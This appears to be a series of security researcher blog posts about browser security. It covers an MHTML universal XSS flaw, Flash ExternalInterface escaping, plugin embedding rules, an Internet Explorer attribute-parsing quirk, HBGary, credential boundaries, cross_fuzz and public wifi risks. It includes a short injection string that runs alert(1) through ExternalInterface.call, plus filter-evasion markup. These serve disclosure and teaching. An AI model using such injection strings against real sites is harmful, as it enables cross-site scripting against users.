That's remarkable, but also completely wrong. It takes days or weeks to find and exploit a vulnerability, and Pwn2own is no exception: the actual exploits are prepared months or weeks in advance, and simply executed on the day the contest takes place. I do not think there is a single person in the information security industry who would say that the discovery of a normal browser vulnerability is a notable event: several hundred such flaws are discovered and resolved every year in every browser, as evidenced by release notes maintained by the vendors with varying degrees of accuracy. Neither the fact that somebody discovered a vulnerability before Pwn2own, nor that this person needed needed five seconds to execute that pre-made code, is a useful measure of anything.

Similarly, the survival of Firefox and Chrome intuitively makes me happy, because I know that these browsers give a lot of thought to security - but I do not think that Pwn2own is a meaningful testament to this. Perhaps these two vendors merely patched up the vulnerability somebody wanted to use, and there was not enough time to find a new one. Or perhaps nobody attending the event (which brings together only a tiny fraction of the infosec community) had the expertise and the inclination to target this particular browser.

Yes, there are vendors who lag behind the rest when it comes to vulnerability response and proactive security work; and there are some hard problems we still have to solve to make the web a safer environment. But the headlines inspired by Pwn2own (and probably encouraged by the organizers) are very unfair, and unnecessarily alienate the parties who should be paying attention to their security posture. Investigating real data, and asking some hard-hitting questions, can make more of a difference... and if done right, it can be more fun.

March 11, 2011

A note on an MHTML vulnerability

There is an ongoing discussion about a recently disclosed, public vulnerability in Microsoft Internet Explorer, and its significance to web application developers. Several of my colleagues investigated this problem in the past few weeks, and so, I wanted to share our findings.

As some of you may be aware, Microsoft Internet Explorer supports MHTML, a simple container format that uses MIME encapsulation (nominally multipart/related) to combine several documents into a single file. Each container may consist of a number of possibly base64-encoded documents, with their content type determined solely by the inline MIME data.

Perhaps by the virtue of not having cross-browser support, the MHTML format is not commonly used on the web - but it is employed by Internet Explorer itself to save downloaded pages to disk; and embraced by some third-party applications to deliver HTML-based documentation and help files.

To facilitate access to MHTML containers, the browser also supports a special mhtml: URL scheme, followed by a fully-qualified URL from which the document is to be retrieved; a "!" delimiter; and the name of the target resource inside the container. Unfortunately, when MHTML containers are accessed over protocols that provide other, normally authoritative means for specifying document type (e.g. Content-Type in HTTP traffic), this protocol-level information is ignored, and a very lax MIME envelope parser is invoked on the retrieved document, instead. The behavior of this parser is not documented, but it appears that in many cases, adequately sanitized user input appearing on HTML pages, in JSON responses, CSV exports, image metadata, and so forth, is sufficient to trick it into treating the underlying document as valid MHTML. All that is needed to keep this parser happy is the ability to place several alphanumeric and punctuation characters on the target page, in several separate lines.

The payload inside such an unintentionally served "MHTML container" is able to execute JavaScript, and has same-origin DOM access to the originating domain; with some minimal effort, it is also able to access to domain-specific cookies. Therefore, this behavior essentially represents a universal cross-site scripting flaw that affects a significant proportion of all sensitive web applications on the Internet.

Based on this 2007 advisory, it appears that a variant of this issue first appeared in 2004, and has been independently re-discovered several times in that timeframe. In 2006, the vendor reportedly acknowledged the behavior as "by design"; but in 2007, partial mitigations against the attack were rolled out as a part of MS07-034 (CVE-2007-2225). Unfortunately, these mitigations did not extend to a slightly modified attack published in the January 2011 post to the full-disclosure@ mailing list.

It appears that the affected sites generally have very little recourse to stop the attack: it is very difficult to block the offending input patterns perfectly, and there may be no reliable way to distinguish between MHTML-related requests and certain other types of navigation (e.g., <embed> loads). A highly experimental server-side workaround devised by Robert Swiecki may involve returning HTTP code 201 Created rather than 200 OK when encountering vulnerable User-Agent strings - as these codes are recognized by most browsers, but seem to confuse the MHTML fetcher itself.

Until the problem is addressed by the vendor through Windows Update, I would urge users to consider installing a FixIt tool released by Microsoft as an interim workaround.

Update: see this announcement for more.

March 06, 2011

The other reason to beware ExternalInterface.call()

Adobe Flash has a function called ExternalInterface.call(...), which implements a JavaScript bridge to the hosting page. It takes two parameters: the first one is the name of the JavaScript function to call. The second one is a string to pass to this function.

It is understood that the first parameter should not be attacker-controlled (of course, mistakes happen :-). It is also understood that there is no inherent harm in putting user input in the second parameter, if the callback function itself is not behaving stupidly; in fact, Adobe documentation gives an example that follows this very pattern:

  ...
  ExternalInterface.call("sendToJavaScript", input.text);
  ...

Such a call would be translated to an eval(...) statement injected on the embedding page. This statement looks roughly the following way:

  try {
    __flash__toXML(sendToJavaScript, "value of input.text"));
  } catch (e) {
    "<undefined/>";
  }

When writing the supporting code behind this call, the authors remembered to use backslash escaping when outputting the second parameter: hello"world becomes hello\"world. Unfortunately, they overlooked the need to escape any stray backslash characters, too.

So, try to figure out what happens if the value of input.text is set to the following string:

  Hello world!\"+alert(1)); } catch(e) {} //

I reported this problem to Adobe in March 2010. In March 2011, after following up, I received the following response:

"We have not made any change to this behavior for backwards compatibility reasons."

Caveat emptor :-)

Warning: OBJECT and EMBED are inherently unsafe

Let's say that you maintain an online discussion forum. Assuming that you explicitly specify the type= parameter in your <object> or <embed> markup, what are the security consequences of allowing users to embed third-party Flash movies in their posts when you enforce the appropriate security restrictions on your end (allowScriptAccess, allowNetworking, allowFullScreen all set to none)? Or, to make things simpler, how about permitting a straightforward video file, with type=video/x-ms-wmv?

If you think this is safe, you may want to know that the HTML5 spec has a different view. The specification effectively takes away the ability for any single party to decide how a particular plugin document should be handled by the browser. Under the new algorithm, instead of your funny cat video, you may accidentally end up embedding Java, which has unconditional access to the DOM of the embedding page through DOMService. Whoops, looks like you are owned now.

According to the spec, if your visitor's browser has, say, a Windows Media Player plugin that recognizes the type=video/x-ms-wmv value on your webpage, that plugin will be used regardless of Content-Type. This part is intuitive. Alas, if the plugin is not found, the specification compels the software to look at Content-Type next, giving the hosting party an opportunity to override the intent specified on your end.

To further complicate the picture, in some circumstances, browsers may also ignore both type= and Content-Type values: for example, Internet Explorer and WebKit browsers will play Flash videos served with Content-Type: pants/whatever and loaded with type=certainly/not-flash just because a stray .swf file extension is spotted somewhere in the URL. The file name signal is problematic, as it can usually be tampered with by whoever provides the URL. This strategy brings a yet another player into the picture, and each party can sabotage the security assurances sought by the rest.

It would be more reasonable to keep the behavior of <object> and <embed> consistent with that of other type-specific subresource tags (e.g., <applet>, <img>, or <script>), and give control over how the document is rendered to whoever authored the markup. This approach is still not without peril, because it makes it impossible for some sites to indicate that a particular text/plain or image/jpeg response is not meant to be interpreted as a malicious applet. But that last problem can be fixed by requiring Content-Type and type= to match, perhaps through an opt-in mechanism controlled with a new HTTP header. And in any case, the proposed logic does not help.

In the end, the currently specified behavior seems highly counterintuitive, and undoes all the work plugin that vendors such as Adobe or Microsoft put into adding security controls to ensure that their plugin content is reasonably safe to embed across domains that do not fully trust each other.

Test cases here. Joshua Stein also reports that they confuse Flash-blocking tools.

February 21, 2011

Give me A, give me P, give me T

Following my earlier entry about HBGary, several people asked if I did not believe in the fashionable concept of Advanced Persistent Threats.

My view is a bit different. Any organization that focuses solely on prevention of non-targeted attacks is making a grave mistake. This hasn't changed at all in the past two decades: attackers interested in a particular target, and willing to spend several weeks on such a pursuit, were always a huge problem. In a vast majority of documented cases, they did not need to be unusually sophisticated to succeed, too - and in proportion to the size of the online economy, I don't think they are more numerous than, say, ten years ago.

Fending off these attackers in large and complex environments is very difficult, and requires in-depth in-house expertise, lots of ingenuity - and even then, it may occasionally fail. Alas, at the behest of vendors and infosec pundits, many organizations made exactly the wrong choice, and spent the bulk of their efforts on ISO 27002, PCI, SOX, and off-the-shelf AV and IDS tools - building a more measurable and familiar, but ultimately vulnerable, world.

It is increasingly evident that the value of these solutions in containing determined attackers is fairly small. The parties involved would prefer to say that they had done the right thing, and the threat landscape has changed in the meantime, instead. But the claim that they are facing a brand new, incredibly sophisticated adversary is a very self-serving one.

So, I am simply saddened by the emphasis on the "advanced" part of the term, and the Cold War rhetoric employed to push even more expensive and ultimately meaningless products and approaches. Whether you are a government agency or a Fortune 500 corporation, chances are, buying services such as 0-day vulnerability notifications or botnet monitoring is not an efficient use of your money.

February 18, 2011

Possibly the most fascinating HTML parser behavior ever

I learned about this tidbit from sirdarckcat. It is in no way new, but the trick is so cute that I just could not resist sharing.

When parsing HTML documents, browsers recognize two methods of specifying tag parameter values: a "bare" form (such as <img src=image.jpg>), which is terminated by angle brackets, whitespaces, and so on; and a quoted form (<img src="image.jpg">) which is terminated only by a matching quote.

Every browser makes the decision by looking at the first non-whitespace character after the name=value separator. If this happens to be a single or a double quotation mark, the second parsing strategy is used; otherwise, the first method is a go. Internet Explorer also recognizes backticks (`) as a faux quote, leading to security flaws in a fair number of HTML filters - but even with this quirk, the behavior is still pretty straightforward. In particular, in the following example, stray quotes will not have any effect on how the tag is interpreted:

<a href=http://www.example.com/?">This text is not a tag parameter anymore.">Click me</a>

But here's the thing: Internet Explorer seems to be doing a substring search for an equals sign followed by a quote anywhere in the parameter name=value pair. Therefore, the following syntax will be parsed in a very different way:

<a href=http://www.example.com/?=">This is still a part of markup indeed!">Click me</a>

It's one of the most unique and surreal HTML parser quirks I am aware of (and it survives to this day in Internet Explorer 9). In principle, it allows any server-side HTML filter to get out of sync with the browser, leading to parameter splitting and tag consumption. In reality, it has a limited practical significance: if your HTML filter is relaxed enough to allow this syntax to go through, it is probably already vulnerable to the abuse of other syntax tricks.

February 16, 2011

The world of HBGary

I am truly frightened by the emerging picture of a compromise of HBGary Federal. And it is not because the allegation of a disturbing business proposal to, among other things, intimidate a well-known journalist and indiscriminately distribute malware.

It is also not because of the likelihood that a similarly opportunistic and amoral corporate culture is endemic to the entire sector - a suspicion made more credible after noticing that the leaked proposal uses the letterhead of another government-friendly company, Palantir, and generously credits a third one: Berico.

No, that's not it. The reason why I am frightened is the emergence of a new class of government contractors - a class that depends on the perpetration of an alluring, yet completely irrelevant belief: that an incredibly sophisticated and determined adversary is constantly scheming to wage a devastating cyber-war against everything we hold dear.

It is an ugly truth: for the past 10 or 15 years, the security industry has made virtually no progress in helping large organizations deal not with Bond-esque villains, but with the simple threat of bored kids and geeks with an agenda - their most significant, and most unpredictable foe. It is tempting to frame the constant stream of high-profile failures as a proof for the evolution of your adversary. But when you realize that almost every single large institution can probably be compromised by a moderately skilled attacker, this explanation just does not ring true.

The inability to solve this increasingly pressing problem is no reason to celebrate - and even less of a reason to push for preposterous, unnecessary spending on silly intelligence services, or to promote overreaching and ill-defined regulation. If anything, it is a reason to reflect on our mistakes and perhaps go back to the drawing board. But between all the talk of cyber-jihad and APT, this unpleasant message is easy to overlook.

...

On the flip side, the difficulty of securing a complex enterprise hardly applies to specialized, well-funded security outlets: that one problem is easy to fix. These companies should have an abundance of expertise and resources to tightly manage and monitor their relatively small and self-contained networks. Similarly, their employees can be reasonably expected to exercise above-average restraint and a good dose of common sense. It is an uncomplicated matter of living up to your own bold claims.

From this perspective, the purported details of the attack on HBGary - a horribly vulnerable, obscure CMS; unpatched internal systems; careless password reuse across corporate systems and Twitter or LinkedIn; and trivial susceptibility to e-mail phishing - are a truly fascinating detail. These tidbits seem to imply either extreme cynicism of their staff... or an ubelievable level of cluelessness. And from a broader perspective, both of these options are pretty scary.

Oh, the ironic part? Despite all the lofty rhetoric, looks like in the end, they have been undone by just a bunch of bored kids.

February 04, 2011

So you think *your* capability model is bad?

In his recent post, Brad Spengler mocked the Linux capability system - a somewhat ill-conceived effort to add modern access controls on top of the traditional Unix permission model. Brad noted that most of the CAP_* boundaries are not particularly well aligned with the underlying OS, and not internally consistent - and therefore, much of the resulting granularity is almost completely meaningless: for example, there is no substantial benefit of giving an application just CAP_SYS_MODULE, CAP_MKNOD, CAP_SYS_PTRACE, or CAP_SYS_TTY_CONFIG privileges, as all of these are essentially equivalent to giving root access to the ACLed program.

I thought it would be interesting to engage in a similar thought experiment for the browser environment - after all, it is quickly becoming the equivalent of a complex and powerful operating system for modern web applications.

As far as normal web applications are considered, there is no concept of a globally privileged access level; permissions to access content on client and server side are controlled by four separate, implicit authentication schemes, instead:

  • HTTP cookies (reference):

    • Visibility: explicitly visible to client and server code.

    • Scoping: scoped to the originating functional domain (or subdomain thereof). Can be additionally scoped to a specific document path; this meaningless as a security boundary.

    • Notes: a kludge to allow scoping to HTTPS only is present - the secure flag; this mechanism offers far less benefit than it could, because HTTP and HTTPS cookie jars are not isolated otherwise.

  • Legacy HTTP authentication (reference):

    • Visibility: explicitly visible to server code; sometimes exposed to client code.

    • Scoping: scoped to a protocol-host name-port tuple. In some but not all browsers, additionally scoped to a specific request path; or to a server-declared "realm" string.

  • Client SSL certificates:

    • Visbility: visible to server code only.

    • Scoping: scoped globally in the browser.

    • Notes: in most but not all browsers, user must confirm sending a certificate to a particular destination host name once within a browsing session.

  • Script origin:

    • Visibility: principally visible to client code only; unreliably disclosed to server on some requests.

    • Scoping: origin is defined by a protocol-host tuple; port number is also included in most, but not all, browsers.

  • Notably absent: network context. The information about the circumstances in which a particular credential is established is not analyzed or preserved. Because of the persistence of web content, this poses a significant problem with public wireless networks.
The above set of overlapping credential schemes is then used to build a number of client-side mechanisms with a range of conflicting security boundaries:
  • Subresource loads (reference):

    • Relevant to: the ability to load images, scripts, plugins, frames, and other types of embedded content; and to navigate the top-level window.

    • Security boundaries: this capability is not generally restricted in modern browsers. Certain response types can be read directly across websites; others can be requested, and then examined only indirectly.

    • Interactions: server response can and often will be tied to server-recognized credentials, including cookies, SSL certificates, or client-supplied origin (non-universal Origin or unsafe Referer header).

  • DOM access (reference):

    • Relevant to: the ability to directly access loaded documents through the JavaScript Document Object Model - a method considerably more versatile than the previous scenario.

    • Security boundaries: privilege scoped to origin; when origin is not fully qualified, behavior is undefined. Scope can be expanded to functional domain via document.domain; this has unintended consequences and is usually unsafe.

    • Interactions: access is not tied to any other credentials; for example, replacing or removing cookies does not revoke access from old documents to the new ones, and vice versa.

  • Most types of browser API access:

    • Relevant to: access to browser-managed interfaces such as postMessage(), localStorage, geolocation information, pop-up privileges, and so forth.

    • Security boundaries: permissions theoretically scoped to origin, but Firefox and MSIE currently violate this rule for localStorage and sessionStorage, and scope to host; when origin is not fully qualified, behavior is undefined. Additional top-level window scoping is introduced for sessionStorage. Unlike with DOM access, these permissions are not affected by document.domain.

    • Interactions: access is not tied to any other credentials.

  • XMLHttpRequest API reference):

    • Relevant to: the ability to make almost arbitrary, credential-bearing HTTP requests, and read back raw responses, from within JavaScript code.

    • Security boundaries: permission scoped to origin; when origin is not fully qualified, behavior is undefined. Port number is always compared, even in browsers that do not include it in other origin checks. Scope not affected by document.domain.

    • Notes: access to another origin is possible after a simple HTTP handshake in modern browsers.

    • Interactions: server response can and often will be tied to server-recognized credentials.

  • Web sockets API (reference):

    • Relevant to: a new HTML5 feature in WebKit browsers, allowing scripts to establish long-lived stream connections to arbitrary servers.

    • Security boundaries: scripts can access any server and port after a successful completion of a challenge-response handshake.

    • Interactions: server is provided with requestor's origin information and cookies to authenticate the request.

  • Cookie access (reference):

    • Relevant to: the ability to read or write the document.cookie property.

    • Security boundary: content is scoped to a particular domain, path, and secure flag level, as governed by cookie scoping rules. Cookies may also be tagged as httponly, preventing reads (but not writes) from within JavaScript.

    • Notes: document.cookie has highly asymmetrical write and read behavior; it is possible to overwrite cookies for subdomains, paths, or secure / httponly settings well outside setter's nominal visibility.

    • Interactions: not tied to any other credentials or network context. Substantially incompatible with DOM access boundaries, affecting both schemes: DOM rules make cookie path scoping useless, while lax cookie scoping often undermines DOM origin-based isolation in cookie-authenticated web applications.

  • Password managers:

    • Relevant to: password auto-completion capabilities integrated with most browsers.

    • Security boundaries: stored credentials are scoped to origin, path, and form layout; only the first part constitutes a meaningful security boundary.

    • Notes: in some but not all browsers, an explicit user action needed to expose credentials to the origin.

    • Interactions: incompatibility with DOM access rules makes path and form scoping useless from security perspective. Existing credentials are not taken into account when completing form data. Saved passwords are generally converted to cookie-based credentials by the server using an application-specific mapping.

  • Cache control:

    • Relevant to: implicit and explicit retrieval of previously cached documents when requested by the client-side code.

    • Security boundaries: cached content is scoped to original request URL and POST payload; once retrieved from the cache, it follows the same rules as any fresh response would.

    • Interactions: caches may be shared by multiple users. Cached content is not explicitly tied to any credentials - logging out does not invalidate cached documents, and does not prevent same-origin access later on. If shared proxies are accidentally permitted to cache the response, it may be returned to other users, even though their requests do not bear relevant cookies.

  • Internet Explorer zone model:

    • Relevant to: a proprietary mechanism that allows elevated privileges to be granted to certain content; and to prevent navigation between certain groups of websites.

    • Security boundaries: a mix of origin scoping for explicitly defined URLs; protocol-level scoping for file:// content; and IP, host name, and proxy configuration heuristics for Intranet resources.

    • Notes: local network heuristics can fail spectacularly in certain settings. Zone settings are fairly cryptic and difficult to understand. Users frequently add not-particularly-trustworthy websites to more privileged zones to work around usability problems.

    • Interactions: not consistently synchronized with any other security boundaries. Largely neglects to consider the impact of cross-site scripting flaws.

  • Plugin access:

    • Relevant to: various activities of plugin-delivered active content, which generally shares the HTTP stack, cookie jar, and document cache with the browser; and has DOM access to the embedding page.

    • Security boundaries: a variety of custom, inconsistent models: for example, Java considers all content originating from the same IP as same-origin; Flash glances over redirects and considers their result same-origin with the initial URL. Most plugins also offer multiple ways to negotiate cross-domain access.

    • Notes: plugin origin is derived from the URL from which the code is retrieved; Content-Type and Content-Disposition is usually ignored during this operation.

    • Interactions: largely inconsistent with all other browser security mechanisms.
Operating systems are more complex and more diverse than browsers; but I dare you to come up with an example of a design nearly as messy and dangerous as this. It not just that the set of capabilities is odd, spurious, and sometimes redundant; but that each and every one of them has a slightly different understanding of who you are, and what permissions you need to be given.

February 01, 2011

The dreaded curse of openness

Several weeks ago, the chairman of Trend Micro had this to say:

"Android is open-source, which means the hacker can also understand the underlying architecture and source code. We have to give credit to Apple, because they are very careful about it. It's impossible for certain types of viruses to operate on the iPhone."

Now that Kaspersky has, ahem, joined the open source crowd - I worry that hackers may soon be able to understand the operation of anti-virus software as well. And beyond that unthinkable point, only darkness looms.

January 01, 2011

Announcing cross_fuzz, a potential 0-day in circulation, and more

I am happy to announce the availability of cross_fuzz - a surprisingly effective but notoriously annoying cross-document DOM binding fuzzer that helped identify about one hundred bugs in all browsers on the market - many of said bugs exploitable - and is still finding more.

The fuzzer owes much of its efficiency to dynamically generating extremely long-winding sequences of DOM operations across multiple documents, inspecting returned objects, recursing into them, and creating circular node references that stress-test garbage collection mechanisms.

This design can make it unexpectedly difficult to get clean, deterministic repros; to that effect, in the current versions of all the affected browsers, we are still seeing a collection of elusive problems when running the tool - and some not-so-elusive ones. I believe that at this point, a broader community involvement may be instrumental to tracking down and resolving these bugs.

I also believe that at least one of the vulnerabilities discovered by cross_fuzz may be known to third parties - which makes getting this tool out a priority.

The following summarizes notification and patch status for all the affected vendors:

  • Internet Explorer: MSRC notified in July 2010. Fuzzer known to trigger several clearly exploitable crashes (example stack trace for CVE-2011-0346) and security-relevant GUI corruption issues (XP-only, example, CVE-2011-0347). >Reproducible, exploitable faults still present in current versions of the browser. I have reasons to believe that one of these vulnerabilities is known to third parties.

    Comment: Vendor has acknowledged receiving the report in July (case 10205jr), but has not contacted me again until my final ping in December. Following that contact attempt, they were able to quickly reproduce multiple exploitable crashes, and asked for the release of this tool to be postponed indefinitely. Since they have not provided a compelling explanation as to why these issues could not have been investigated earlier, I refused; see this timeline for more.

  • All WebKit browsers: WebKit project notified in July 2010. About two dozen crashes identified and addressed in bug 42959 and related efforts by several volunteers. Relevant patches generally released with attribution in security bulletins. Some extremely hard-to-debug memory corruption problems still occurring on trunk.

  • Firefox: Mozilla notified in July 2010. Around 10 crashes addressed in bug 581539, with attribution in security bulletins where appropriate. Fuzzing approach subsequently rolled into Jesse Ruderman's fuzzing infrastructure under bug 594645 in September; from that point on, 50 additional bugs identified (generally with no specific attribution at patch time). Several elusive crashes still occurring on trunk. Bad read / write offset crashes in npswf32.dll can also be observed if the plugin is installed.

  • Opera: vendor notified in July 2010. Update provided in December states that Opera 11 fixed all the frequent crashes, and that a proper security advisory will be released at a later date (release notes list a placeholder statement: "fixed a high severity issue"). Several tricky crashes reportedly still waiting to be resolved.

    Note that with Opera, the fuzzer needs to be restarted frequently.

Well, that's it. To download the tool or see it in action, you can follow this link. The fuzzer may be trivially extended to work with any other DOM-compliant documents, plugin bindings, and so forth.

December 20, 2010

Carrot, stick, research, disclosure

Several days ago, Marcia Hoffman of Electronic Frontier Foundation praised Facebook's policy on vulnerability reports - and went as far as calling it "exceptional":

"If you share details of a security issue with us and give us a reasonable period of time to respond to it before making it public, and in the course of that research made a good faith effort to avoid privacy violations, destruction of data, or interruption or degradation of our service, we will not bring any lawsuit against you or ask law enforcement to investigate you for that research."

I respect my colleagues at Facebook - but I do not think this policy deserves such praise.

The problem is that with extremely rare exceptions, software vendors do not object to being given reasonable notice about a vulnerability - but one of the most significant points of contention between them and the research community is the meaning of that single, special word: "reasonable".

Because of different incentives, businesses have a history of allowing privately reported vulnerabilities to go unresolved for a year or more; and many of the best-known names in the industry have attempted to suppress good-faith attempts to alert the public to their apparent non-responsiveness.

I suspect that Facebook is capable and willing to respond to vulnerability reports promptly, and will not resort to such tricks - but that does not make the policy sound any better. The promise not to sue people who satisfy an unspecified but vendor-defined expectation of "reasonable time" implicitly creates a threat of prosecution in non-compliant cases; and equates them to other, clearly malicious practices listed in that aforementioned paragraph.

There are interesting examples of exceptional, researcher-friendly policies out there; this one doesn't belong, yet.

December 13, 2010

Unencrypted public wifi should die

Unencrypted public access wireless networks are an unbelievably harmful technology devised with no regard for the operation of the modern web - and they introduce far more problems than immediately apparent. The continued use unencrypted wifi on municipal level and in consumer-oriented settings is simply inexcusable, even if all the major websites on the Internet can be pressured into employing HTTPS-only access and Strict Transport Security by default.

Straightforward snooping and cute tricks such as sslstrip aside - all of them still deadly effective, by the way - there are many less obvious problems we simply can't solve any time soon:

  • Cookie poisoning: JavaScript same-origin policy draws a clear boundary between encrypted and non-encrypted content - but HTTP cookies are critically broken in this regard. It is possible to selectively overwrite secure cookies with malicious values over HTTP - with disastrous consequences for most of the contemporary web apps.

  • Plugin SOP problems: similarly to cookies, the variants of same-origin access rules implemented by plugins such as Java, Flash, or Silverlight, are often peculiar - and do not necessarily respect the isolation between encrypted and non-encrypted content (but share the cookie jar and document cache with the rest of the browser).

  • Cache poisoning: browser cache persists across network visits. On insecure wireless networks, malicious active content can be persistently cached in any non-encrypted origin - even if that origin is not intentionally visited - and will be carried onto trusted networks accessed later on (e.g., home or corporate environments); in other words, your browser may be essentially permanently backdoored after a single visit to a public hotspot. Curiously, there is some renewed interest in this area of recent. HTML5 features such as cache manifests and local storage promise to make the problem even more pronounced.

  • Cache retrieval: for the same reason, content injected over insecure wireless networks can comprehensively enumerate and read back all previously stored objects in browser cache, in arbitrarily selected non-encrypted origins - a huge privacy problem for as long as any remotely sensitive data is still exchanged over HTTP - even when this exchange itself happens only over private, secure networks.

  • Address bar autocompletion poisoning: even with mechanisms such as Strict Transport Security in place, content injected over insecure networks may attempt to silently poison address bar autocompletion mechanisms - ensuring that future attempts to navigate to a particular website will be completed in a subtly incorrect way, and will take the victim to a malicious domain name instead.
The only good way to eliminate all these risks is phasing out browser-level HTTP support altogether; but that's impractical, and simply wrong - and as much as I admire EFF, I think that universal SSL is not the right battle to fight. The burden of not decreasing user safety should rest with those introducing new standards or promoting new use cases; and something clearly went pretty awry here. We should be working hard to fix it soon - and never let it happen again.

PS. As of today, encrypted 802.11 is not much better for this use: the fiasco of WEP aside, on WPA2-PSK networks with publicly advertised key, insiders may simply decode and modify traffic to other clients by watching the handshake; while other authentication systems may be vulnerable to "Hole 196". On top of that, attackers may opt to impersonate "trusted" access points as seen fit. These shortcomings are incredibly frustrating - but can be addressed; in fact, some proprietary workarounds seem to be available already.